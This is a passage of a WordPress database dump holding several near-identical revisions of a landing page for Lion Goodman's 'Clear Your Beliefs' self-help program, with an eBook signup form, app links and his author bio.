style="clear:both"></div>  \r\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" class="aligncenter size-medium wp-image-1433" />\r\n<div>\r\n<p>I’m Lion Goodman, creator of the Clear Your Beliefs program.  I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen  modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.  \r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the Clear Your Beliefs program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away – like magic.  And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="">\r\n</p>\r\n</div>                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">\r\n<h3>Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\r\n\r\n<p>Bring the Clear Your Beliefs process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\r\n</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:40:26', '2014-09-21 20:40:26', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1436, 4194, '2014-09-21 15:52:46', '2014-09-21 20:52:46', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" /></div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img class="" src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:52:46', '2014-09-21 20:52:46', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1437, 4194, '2014-09-21 15:59:22', '2014-09-21 20:59:22', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" /></div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n<li></li>\r\n<li></li>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img class="" src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:59:22', '2014-09-21 20:59:22', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1438, 4194, '2014-09-21 16:00:27', '2014-09-21 21:00:27', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:00:27', '2014-09-21 21:00:27', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1439, 4194, '2014-09-21 16:03:15', '2014-09-21 21:03:15', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:03:15', '2014-09-21 21:03:15', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1440, 4194, '2014-09-21 16:04:08', '2014-09-21 21:04:08', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n<p>&nbsp;</p>\r\n\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to 